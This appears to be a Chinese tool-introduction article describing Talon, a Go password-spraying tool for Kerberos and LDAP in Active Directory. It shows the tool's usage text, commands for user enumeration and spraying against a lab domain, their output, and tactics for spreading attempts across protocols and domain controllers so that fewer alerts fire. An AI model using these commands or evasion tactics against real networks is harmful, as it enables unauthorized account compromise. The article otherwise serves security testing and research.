91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

針對Kerberos和LDAP服務的密碼爆破工具Talon是怎樣的

發布時間:2021-12-24 14:51:21 來源:億速云 閱讀:181 作者:柒染 欄目:網絡安全

針對Kerberos和LDAP服務的密碼爆破工具Talon是怎樣的,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

Talon

Talon是一款針對Kerberos和LDAP服務的密碼爆破工具,該工具能夠在保持在無法被檢測到的情況下執行自動化的密碼爆破攻擊。Talon能夠枚舉Kerberos用戶列表,并識別出有效的用戶角色。除此之外,Talon還可以針對Kerberos和LDAP Secure服務來執行密碼爆破攻擊。Talon能夠使用一個或多個域控制器來執行這些攻擊,并且能夠實現域控制器和服務(Kerberos或LDAP Secure)之間的請求隨機化。

工具下載

廣大研究人員可以訪問該項目的【Releases頁面】來下載對應操作系統架構的Talon。

針對Kerberos和LDAP服務的密碼爆破工具Talon是怎樣的

工具使用

$ ./Talon -h

Usage of ./Talon:

  -D string

     Fully qualified domain to use

  -E Enumerates which users are valid

  -H string

     Domain controller to connect to

  -Hostfile string

     File containing the list of domain controllers to connect to

  -K Test against Kerberos only

  -L Test against LDAP only

  -O string

     File to append the results to

  -P string

     Password to use

  -U string

     Username to authenticate as

  -Userfile string

     File containing the list of usernames

  -debug

     Print debug statements

  -sleep float

     Time inbetween attempts (default 0.5)

枚舉模式

用戶枚舉模式可以使用-E選項來執行,該模式下的Talon只會向目標目標KDC發送Kerberos TGT預認證請求,不過這個請求目前使用的是不支持的加密類型。Talon將會檢查KDC返回的響應信息,并判斷其中是否包含KDC_ERR_ETYPE_NOSUPP(表明用戶存在)或DC_ERR_C_PRINCIPAL_UNKNOWN(表明用戶不存在)。Talon能夠針對目標企業中的多個域控制器來執行這種類型的枚舉操作,使用-Hostfile命令即可指定多個域控制器,或使用-H來指定單個域控制器。這項技術并不會觸發登錄失敗的情況,因此不會鎖定任何用戶賬號。

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile Users -sleep 1 -E

 

  __________  ________  ___       ________  ________

  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \

  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \

       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \

        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \

         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\

          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

          (@Tyl0us)

 

 

[-]  172.16.144.195 STARLABS.LOCAL\asmith:  = User Does Not Exist

[+]  172.16.144.185 STARLABS.LOCAL\ballen:  = User Exist

[-]  172.16.144.186 STARLABS.LOCAL\bjohnson:  = User Does Not Exist

[-]  172.16.144.195 STARLABS.LOCAL\bwayne:  = User Does Not Exist

[+]  172.16.144.195 STARLABS.LOCAL\csnow:  = User Exist

[-]  172.16.144.186 STARLABS.LOCAL\jtodd:  = User Does Not Exist

[+]  172.16.144.186 STARLABS.LOCAL\hwells:  = User Exist

[-]  172.16.144.186 STARLABS.LOCAL\wwest:  = User's Account Locked

自動化密碼爆破模式

Talon針對的是Kerberos和LDAP,這兩個服務都整合進了活動目錄AD中以實現身份認證。Talon能夠通過在這兩個服務之間交替執行密碼爆破攻擊,從而實現在兩個協議之間分割密碼攻擊流量。這會拆分生成的潛在事件數量,從而減少發出警報的幾率。Talon更進一步,通過使用-Hostfile向企業中的多個域控制器分發密碼攻擊,每次在LDAP和Kerberos之間交替,以創建額外的模糊層。如果需要,可以使用-H命令提供單個域控制器。

./Talon -D STARLABS.LOCAL -Hostfile DCs -Userfile ValidUsers -P "Not3vil" -sleep 1

 

  __________  ________  ___       ________  ________

  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \

  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \

       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \

        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \

         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\

          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

          (@Tyl0us)

 

                

[-]  172.16.144.186 STARLABS.LOCAL\admin:Not3vil = Failed

[-]  172.16.144.185 STARLABS.LOCAL\ballen:Not3vil = Failed

[-]  172.16.144.195 STARLABS.LOCAL\cramon:Not3vil = Failed

[+]  172.16.144.185 STARLABS.LOCAL\hwells:Not3vil = Success

[-]  172.16.144.195 STARLABS.LOCAL\ssmith:Not3vil = Failed

Talon還可以使用-K選項或-L選項來進隊Kerberos或LDAP執行滲透攻擊。

除此之外,在執行密碼爆破攻擊的過程中,Talon還可以使用Kerberos和LDAP來讀取響應信息。Talon能夠在執行密碼破解攻擊的過程中,通過讀取每一次密碼請求嘗試返回的響應碼來檢測賬號鎖定情況,這將幫助我們防止在企業內部網絡進行測試的時候出現賬號被鎖定的情況,以避免被檢測到。

root@kali:~# ./Talon -Hostfile DCs -Userfile ValidUsers -D STARLABS.local -P "Password!" -sleep 2

 

  __________  ________  ___       ________  ________

  |\___    _\\\   __  \|\  \     |\   __  \|\   ___  \

  \|___ \  \_\ \  \|\  \ \  \    \ \  \|\  \ \  \\ \  \

       \ \  \ \ \   __  \ \  \    \ \  \\\  \ \  \\ \  \

        \ \  \ \ \  \ \  \ \  \____\ \  \\\  \ \  \\ \  \

         \ \__\ \ \__\ \__\ \_______\ \_______\ \__\\ \__\

          \|__|  \|__|\|__|\|_______|\|_______|\|__| \|__|

          (@Tyl0us)

 

 

[-]  172.16.144.186 STARLABS.LOCAL\ballen:Password! = Failed

[-]  172.16.144.185 STARLABS.LOCAL\csnow:Password! = Failed

[-]  172.16.144.186 STARLABS.LOCAL\wwest:Password! = User's Account Locked

[*] Account lock out detected - Do you want to continue.[y/n]:

代碼貢獻

Talon基于Golang開發,如需貢獻自己的代碼,首先請將該項目代碼庫克隆至本地。在編譯Talon之前,我們還需要安裝好相應的依賴組件。請先運行下列命令:

go get github.com/fatih/color

go get gopkg.in/jcmturner/gokrb5.v7/client

go get gopkg.in/jcmturner/gokrb5.v7/config

go get gopkg.in/jcmturner/gokrb5.v7/iana/etypeID

go get gopkg.in/ldap.v2

接下來,運行下列命令實現項目構建:

go build Talon.go

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

莒南县| 舞钢市| 崇明县| 鄱阳县| 嵩明县| 峨边| 积石山| 浏阳市| 通山县| 团风县| 建瓯市| 北京市| 永平县| 颍上县| 苗栗县| 钟祥市| 营口市| 泰安市| 金沙县| 平和县| 屯昌县| 平定县| 淄博市| 南岸区| 田阳县| 宾川县| 墨竹工卡县| 当雄县| 略阳县| 青川县| 蓬安县| 蓬莱市| 新沂市| 龙江县| 阿拉善右旗| 都昌县| 苏尼特右旗| 卓资县| 陕西省| 沂水县| 阿瓦提县|